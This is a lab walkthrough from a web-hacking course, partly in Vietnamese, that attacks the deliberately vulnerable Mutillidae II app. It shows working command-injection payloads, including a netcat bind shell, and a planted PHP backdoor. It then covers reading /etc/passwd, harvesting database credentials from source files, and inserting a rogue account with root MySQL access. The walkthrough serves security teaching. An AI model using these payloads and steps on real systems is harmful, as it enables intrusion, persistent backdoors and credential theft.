OWASP Top 10 Web Hacking Final Lab 3 - Command Injection Netcat Session

{ Command Injection Netcat Session }

Bài thực hành cuối khóa của lớp OWASp Top 10 Web Hacking

• • Lưu ý là các IP sẽ khác với hệ thống lab của các bạn, ngoài ra hình ảnh minh họa trên Backtrack, chúng ta sẽ thực hiện trên Attacker là Kali hoặc là máy thật tùy tình huống.
  •  
• What Mutillidae?
  • OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.
• What is Command Injection?
  • Command Injection occurs when an attacker is able to run operating system commands or serverside scripts from the web application.  This vulnerability potential occurs when a web application allows you to commonly do a nslookup, whois, ping, traceroute and more from their webpage.  You can test for the vulnerability by using a technique called fuzzing, where a ";" or "|" or "||" or "&" or "&&" is append to the end of the expected input (eg., www.cnn.com) followed by a command (eg., cat /etc/passwd).
• What is netcat?
  • Netcat is a computer networking service for reading from and writing to network connections using TCP or UDP. Netcat is designed to be a dependable "back-end" device that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and investigation tool, since it can produce almost any kind of correlation you would need and has a number of built-in capabilities. Netcat is often referred to as a "Swiss-army knife for TCP/IP". Its list of features includes port scanning, transferring files, and port listening, and it can be used as a backdoor.

• Start Web Browser Session to Mutillidae

1. On BackTrack, Open Firefox
   • Instructions:
     1. Click on the Firefox Icon
   • Notes (FYI):
     • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
   • 
2. Open Mutillidae
   • Notes (FYI):
     • Replace 192.168.48.129 in the following URL --> http://192.168.48.129/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
   • Instructions:
     1. http://192.168.48.129/mutillidae
   • 

Section 8. Netcat Command Execution

1. Go to DNS Lookup
   • Instructions:
     1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Reflected (First Order) --> DNS Lookup
    
2. Execute Netcat  
   • Notes(FYI):
     • Below we are going to append NetCat to the basic nslookup test.  :)
   • Instructions:
     1. www.cnn.com;mkfifo /tmp/pipe;sh /tmp/pipe | nc -l 4444 > /tmp/pipe
        • Make a FIFO named pipe.
        • Pipes allow separate processes to communicate without having been designed explicitly to work together.
        • This will allow two processes to connect to netcat.
        • nc -l 4444, tells netcat to listen and allow connections on port 4444.
     2. Click Lookup DNS
     3. Continue to next step
        • Note: No results will be displayed to this webpage, please continue to next step.
    
3. Verifying Results
   • Note(FYI):
     1. Notice in the upper left tab, there is a connection pin-wheel that constantly spins.
     2. Notice in the lower left corner, the status bar displays the message transferring data.
     3. Both of these messages are a good signs that netcat is running and listening for a connection.
   • Instructions:
     1. Continue to next section.

Section 9. Connecting to Netcat

1. Connect to Netcat
   • Notes(FYI):
     • Implement the following instructions on the BackTrack VM
     • Replace 192.168.48.129 with the Fedora(Mutillidae) IP Address obtained from (Section 3, Step 3).
   • Instructions:
     1. nc 192.168.48.129 4444
        • Use BackTrack to Connect to the Mutillidae Netcat session on port 4444
     2. hostname
        • This is server hostname that hosts DVWA.
     3. whoami
        • Print the effective UserID.
        • Ie., Who am I connected as.
   • 
2. Directory and Username Reconnaissance
   • Notes (FYI):
     • We already know that we connected as the apache user, but we also want to know what is our current working directory.
     • Also, we want to know if we have the ability to create a file within the current working directory.   
   • Instructions:
     1. pwd
        • Print the current working directory
     2. uname -a
        • Print system information (eg., Operating System & Version, Kernel, etc).
     3. cat /etc/passwd > passwd.txt
        • Create a passwd.txt file located in /var/www/html/mutillidae
     4. ls -l $PWD/passwd.txt
        • List the passwd.txt file.

Section 10. Viewing /etc/passwd

1. Open New FireFox Tab
   • Notes (FYI):
     • Perform the following instructions on BackTrack's Firefox.
   • Instructions:
     1. Click on the Green Plus to create a new tab
   • 
2. View /etc/passwd
   • Notes (FYI):
     • Replace 192.168.48.129 with the Fedora (Mutillidae) IP Address obtained in (Section 3, Step 3).
     • It nice to be able to view the password file, but the real feat was to be able to create a file and view it on the apache webserver.  (Prepare for some black magic).
   • Instructions:
     1. Place the following link in the Address Bar.
        • http://192.168.48.129/mutillidae/passwd.txt

Section 11. Create PHP Backdoor

1. Discover the Database Engine using the /etc/passwd file
   • Notes (FYI):
     • Perform the following instructions using your previous BackTrack Terminal Netcat session.
     • We now we can create a file on the Apache Webserver in the /var/www/html/mutillidae directory.
     • Let's create a php script that will serve as a netcat backdoor without having to execute netcat using the nslookup command execution.  
   • Instructions:
     1. echo "<?php system(\"mkfifo /tmp/pipe2;sh /tmp/pipe2 | nc -l 3333 > /tmp/pipe2\"); ?>" > nc_connect.php
     2. ls -l $PWD/nc_connect.php
     3. chmod 700 nc_connect.php
     4. ls -l $PWD/nc_connect.php
     5. cat nc_connect.php
2. Execute nc_connect.php
   • Notes (FYI):
     • Perform the next steps in BackTrack's second Firefox tab.
     • Replace 192.168.48.129 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
     • Use the second Firefox tab that you previously viewed the /etc/passwd file with to execute the nc_connect.php script.  
   • Instructions:
     1. Place the following link in the Address Bar.
        • http://192.168.48.129/mutillidae/nc_connect.php
     2. Continue to Next Step
3. On BackTrack, Start up a "another" terminal window
   • Instructions:
     1. Click on the Terminal Window
   • 
4. Viewing your netcat sessions
   • Notes (FYI):
     • This terminal window will be used to connect to the nc_config.php netcat session.
     • Replace 192.168.48.129 with the Fedora (Mutillidae) IP Address obtain in (Section 3, Step 3).
   • Instructions:
     1. nc 192.168.48.129 3333
     2. whoami
     3. ps -eaf | egrep '(3333|4444)'
   • 

Section 10. PHP Script Interrogation

1. List all php scripts
   • Notes (FYI):
     • Perform the next steps in the nc_config.php netcat terminal.
     • Our next step is to try to figure out if any of the php scripts located under /var/www/html/mutillidae contain a database username and password.
     • But, first, let's count all the php scripts and include files.
   • Instructions:
     1. pwd
        • This show the current working directory to be /var/www/html/mutillidae.
     2. find * -name "*.php" | wc -l
        • Count the number of php script located in the current working directory.
     3. find * -name "*.inc" | wc -l
        • Count the number of php include files located in the current working directory.
   • 
2. List all php scripts
   • Notes (FYI):
     • Now we are going to search each include file (*.inc) for the string "password" AND the strings "db" OR "database".
   • Instructions:
     1. find * -name "*.inc" | xargs grep -i password | egrep -i '(db|database)'
        • find * -name "*.inc", find all files with the *.inc extension in the current working directory.
        • xargs, build and execute command lines from standard input
        • grep -i password, ignore case and search for the string "password".
        • egrep -i '(db|database)', ignore case and search for the strings "db" OR "database".
3. Search php scripts for the string password
   • Notes (FYI):
     • Now we will search the 900+ php scripts for the string "password" AND the strings ("db" OR "database") AND the string "=".
     • I will use head -8 to show only the first 8 lines, but feel free to remove the "| head -8" to see all the results.
     • The name of the script that contains the database password is MySQLHandler.php.
   • Instructions:
     1. find * -name "*.php" | xargs grep -i password | egrep -i '(db|database)' | grep "=" | head -8
4. Search MySQLHandler.php for authentication information
   • Notes (FYI):
     • Below I will search the MySQLHandler.php script for the strings (password OR username OR database) and the string "=".
     • Notice the username (root), password (samurai), and database (nowasp) is listed in the results.
   • Instructions:
     1. find * -name "MySQLHandler.php" | xargs egrep -i '(password|username|database)' | grep "=" | head -10

Section 11. Database Interrogation

1. Basic Database Interrogation
   • Notes (FYI):
     • Perform the next steps in the nc_config.php netcat terminal.
     • The below command shows you how to execute database commands in the netcat session.
     • show databases, allows you to view all databases.
     • use nowasp; show tables, means use the nowasp database and show its's tables.
   • Instructions:
     1. echo "show databases;" | mysql -uroot -psamurai
     2. echo "use nowasp; show tables;" | mysql -uroot -psamurai
2. Interrogate the accounts table
   • Notes (FYI):
     • The below command shows you how to view the column fields of the accounts tables.
     • In addition, you will run a basic select statement to view the contents of the accounts table.
   • Instructions:
     1. echo "use nowasp; desc accounts;" | mysql -uroot -psamurai
     2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai
3. Create a new user in the accounts table
   • Notes (FYI):
     • The below command shows you how to create a new username using the MySQL insert command.
     • Pay attention to the last record of your select statement results.
   • Instructions:
     1. echo "insert into nowasp.accounts values (null,'hacker33','p4sSw0rd!','H4ck 4 fo0d','TRUE');" | mysql -uroot -psamurai
     2. echo "select * from nowasp.accounts;" | mysql -uroot -psamurai

Section 12. Proof of Lab

1. Proof of Lab
   • Notes (FYI):
     • Perform the next steps in the nc_config.php netcat terminal
     • Use nc_config.php netcat session for the below directions.
   • Instructions:
     1. echo "select * from nowasp.accounts where username = 'hacker33';" | mysql -uroot -psamurai
     2. netstat -nao | egrep '(3333|4444)'
     3. date
     4. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
   • 1. Nộp bài : Hãy quay lại toàn bộ quá trình thực hành, với text note có tên người thực hiện.